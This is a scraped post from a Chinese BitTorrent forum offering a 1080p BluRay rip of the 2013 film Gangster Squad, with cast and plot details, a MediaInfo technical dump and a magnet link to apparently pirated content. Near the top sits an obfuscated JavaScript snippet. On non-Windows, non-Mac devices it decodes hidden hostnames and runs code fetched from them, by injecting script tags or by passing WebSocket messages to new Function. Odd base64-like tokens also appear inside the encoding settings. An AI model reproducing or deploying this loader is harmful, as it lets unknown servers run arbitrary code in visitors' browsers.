匪帮传奇[简繁字幕]Gangster.Squad.2013.1080p.BluRay.x264.DTS-迅雷下载 9.46GB

版主小s 2月前 247

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 匪帮传奇 / 反黑暴队(港) / 风云男人帮(台) / 捣黑小队

◎片 名 Gangster Squad

◎年 代 2013

◎产 地 美国

◎类 别 剧情 / 动作 / 惊悚 / 犯罪

◎语 言 英语

◎上映日期 2013-01-11(美国)

◎IMDb链接 https://www.imdb.com/title/tt1321870/

◎豆瓣评分 6.5/10 (14827人评价)

◎豆瓣链接 https://movie.douban.com/subject/3282396/

◎片 长 113分钟

◎导 演 鲁本·弗雷斯彻 Ruben Fleischer (id:1274906)

◎编 剧 威尔·比尔 Will Beall (id:1326235)

Paul Lieberman Paul Lieberman (id:1326259)

◎演 员 乔什·布洛林 Josh Brolin (id:1004568)

瑞恩·高斯林 Ryan Gosling (id:1012531)

西恩·潘 Sean Penn (id:1054527)

艾玛·斯通 Emma Stone (id:1040506)

乔什·平茨 Josh Pence (id:1252378)

迈克尔·佩纳 Michael Pe?a (id:1131634)

安东尼·麦凯 Anthony Mackie (id:1027217)

吉奥瓦尼·瑞比西 Giovanni Ribisi (id:1036317)

米瑞·伊诺丝 Mireille Enos (id:1314624)

罗伯特·帕特里克 Robert Patrick (id:1041135)

尼克·诺特 Nick Nolte (id:1006989)

弗兰克·格里罗 Frank Grillo (id:1100321)

约翰尼·科瓦内 Jonny Coyne (id:1318892)

乔·鲍里托 Jon Polito (id:1014041)

奥斯汀·艾布拉姆斯 Austin Abrams (id:1339630)

麦克斯韦·佩里·科顿 Maxwell Perry Cotton (id:1253761)

丹尼斯·库克鲁姆 Dennis Cockrum (id:1363738)

马拉纳·李 Malana Lea (id:1332154)

伊斯特·斯高特 Esther Scott (id:1363169)

詹姆斯·卡佩内罗 James Carpinello (id:1022778)

约翰·R·邓肯 John R. Duncan (id:1432768)

杰克·麦吉 Jack McGee (id:1313133)

杰夫·沃尔夫 Jeff Wolfe (id:1276454)

韦德·威廉姆斯 Wade Williams (id:1167705)

安拜·柴尔德斯 Ambyr Childers (id:1326630)

沙利文·斯特普尔顿 Sullivan Stapleton (id:1314108)

Lucy Walsh Lucy Walsh (id:1451563)

奥斯丁·格尔 Austin Gorg (id:1368727)

梅格·艾弗李斯特 Meg Everist (id:1283362)

◎标 签 美国 / 黑帮 / 犯罪 / 动作 / 警匪 / 暴力 / 剧情 / 枪战

◎简 介

20世纪40年代,前拳击冠军Mickey Cohen(西恩·潘 Sean Penn 饰)是洛杉矶最有势力的黑帮老大,他一边经营着卖淫、赌博等活动,一边贿赂洛杉矶警方和法官,在洛杉矶为非作歹,为霸一方。洛杉矶警官John O'Mara(乔什·布洛林 Josh Brolin 饰)嫉恶如仇,从来没有畏惧过Micky,刚刚破坏了他的一个卖淫窝点。这一次,洛杉矶警长Bill Parker决定对Micky展开决战,他让John组织一个秘密小组,以铲除Micky为目标。John在妻子的建议下,找到了他在警局的朋友Jerry(瑞恩·高斯林 Ryan Gosling 饰),同时也是Micky的情人Grace(艾玛·斯通 Emma Stone 饰)的男朋友;神枪手Max Kennard;同样嫉恶如仇的黑人警察Coleman Harris;前情报机关人员Conwell K...

  1. General

  2. Unique ID : 125315937622883291176185881472239228940 (0x5E46F8BFDE719B8C2C096FC63AC5580C)

  3. Complete name : [email protected]

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 9.46 GiB

  7. Duration : 1 h 52 min

  8. Overall bit rate : 12.0 Mb/s

  9. Encoded date : UTC 2021-07-14 03:59:06

  10. Writing application : mkvmerge v58.0.0 ('Supper's Ready') 64-bit

  11. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  12. Video

  13. ID : 1

  14. Format : AVC

  15. Format/Info : Advanced Video Codec

  16. Format profile : [email protected]

  17. Format settings : CABAC / 4 Ref Frames

  18. Format settings, CABAC : Yes

  19. Format settings, Reference frames : 4 frames

  20. Codec ID : V_MPEG4/ISO/AVC

  21. Duration : 1 h 52 min

  22. Bit rate : 10.4 Mb/s

  23. Width : 1 920 pixels

  24. Height : 800 pixels

  25. Display aspect ratio : 2.40:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 8 bits

  31. Scan type : Progressive

  32. Bits/(Pixel*Frame) : 0.283

  33. Stream size : 8.21 GiB (87%)

  34. Writing library : x264 core 163 r3059+79M f2a8266 t_mod_test_xavc [(8 & 10)[email protected] X86_64]

  35. Encoding settings : cabac=1 / ref=4 / deblock=1:-3:-3 / analyse=0x3:0x133 / me=umh / subme=11 / psy=1 / fade_compensate=0.00 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=48 / chroma_me=1 / trellis=2 / 8x8dct=1 / cqm=0 / deadzone=21,11 / fast_pskip=0 / chroma_qp_offset=-3 / threads=24 / lookahead_threads=6 / sliced_threads=0 / nr=0 / decimate=0 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / constrained_intra=0 / fgo=0 / bframes=11 / b_pyramid=2 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=240 / keyint_min=1 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / intra_refresh=0 / rc_lookahead=72 / rc=crf / mbtree=0 / crf=17.0000 / qcomp=0.70 / qpmin=0:0:0 / qpmax=69:69:69 / qpstep=4 / vbv_maxrate=62500 / vbv_bufsize=78125 / crf_max=0.0 / nal_hrd=none / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / pb_ratio=1.30 / aq=3:0.90 / aq-sensitivity=10.00 / aq-factor=1.00:1.00:1.00 / aq2=0 / aq3=0

  36. Language : English

  37. Default : Yes

  38. Forced : No


  39. Audio

  40. ID : 2

  41. ID in the original source medium : 4352 (0x1100)

  42. Format : DTS

  43. Format/Info : Digital Theater Systems

  44. Codec ID : A_DTS

  45. Duration : 1 h 52 min

  46. Bit rate mode : Constant

  47. Bit rate : 1 509 kb/s

  48. Channel(s) : 6 channels

  49. Channel layout : C L R Ls Rs LFE

  50. Sampling rate : 48.0 kHz

  51. Frame rate : 93.750 FPS (512 SPF)

  52. Bit depth : 16 bits

  53. Compression mode : Lossy

  54. Stream size : 1.19 GiB (13%)

  55. Language : English

  56. Default : Yes

  57. Forced : No

  58. Original source medium : Blu-ray


  59. Text #1

  60. ID : 3

  61. ID in the original source medium : 4618 (0x120A)

  62. Format : PGS

  63. Muxing mode : zlib

  64. Codec ID : S_HDMV/PGS

  65. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  66. Duration : 1 h 43 min

  67. Bit rate : 42.1 kb/s

  68. Count of elements : 2610

  69. Stream size : 31.1 MiB (0%)

  70. Title : 简英

  71. Language : Chinese

  72. Default : Yes

  73. Forced : No

  74. Original source medium : Blu-ray


  75. Text #2

  76. ID : 4

  77. ID in the original source medium : 4619 (0x120B)

  78. Format : PGS

  79. Muxing mode : zlib

  80. Codec ID : S_HDMV/PGS

  81. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  82. Duration : 1 h 43 min

  83. Bit rate : 42.4 kb/s

  84. Count of elements : 2610

  85. Stream size : 31.3 MiB (0%)

  86. Title : 繁英

  87. Language : Chinese

  88. Default : No

  89. Forced : No

  90. Original source medium : Blu-ray


  91. Text #3

  92. ID : 5

  93. ID in the original source medium : 4620 (0x120C)

  94. Format : PGS

  95. Muxing mode : zlib

  96. Codec ID : S_HDMV/PGS

  97. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  98. Duration : 1 h 43 min

  99. Bit rate : 23.1 kb/s

  100. Count of elements : 2610

  101. Stream size : 17.0 MiB (0%)

  102. Title : 简中

  103. Language : Chinese

  104. Default : No

  105. Forced : No

  106. Original source medium : Blu-ray


  107. Text #4

  108. ID : 6

  109. ID in the original source medium : 4621 (0x120D)

  110. Format : PGS

  111. Muxing mode : zlib

  112. Codec ID : S_HDMV/PGS

  113. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  114. Duration : 1 h 43 min

  115. Bit rate : 23.3 kb/s

  116. Count of elements : 2610

  117. Stream size : 17.2 MiB (0%)

  118. Title : 繁中

  119. Language : Chinese

  120. Default : No

  121. Forced : No

  122. Original source medium : Blu-ray


  123. Text #5

  124. ID : 7

  125. ID in the original source medium : 4608 (0x1200)

  126. Format : PGS

  127. Muxing mode : zlib

  128. Codec ID : S_HDMV/PGS

  129. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  130. Duration : 1 h 52 min

  131. Bit rate : 32.2 kb/s

  132. Count of elements : 2880

  133. Stream size : 25.9 MiB (0%)

  134. Title : 英语

  135. Language : English

  136. Default : No

  137. Forced : No

  138. Original source medium : Blu-ray


  139. Menu

  140. 00:00:00.000 : 第 01 章

  141. 00:09:53.634 : 第 02 章

  142. 00:20:51.166 : 第 03 章

  143. 00:28:36.172 : 第 04 章

  144. 00:39:22.860 : 第 05 章

  145. 00:49:25.462 : 第 06 章

  146. 00:59:59.262 : 第 07 章

  147. 01:09:23.492 : 第 08 章

  148. 01:20:05.258 : 第 09 章

  149. 01:31:01.539 : 第 10 章

  150. 01:38:50.341 : 第 11 章

  151. 01:44:11.370 : 第 12 章


TAGS 动作 剧情 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:370C2FEE9D848EA20E4B965D1C349B93F289542F
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回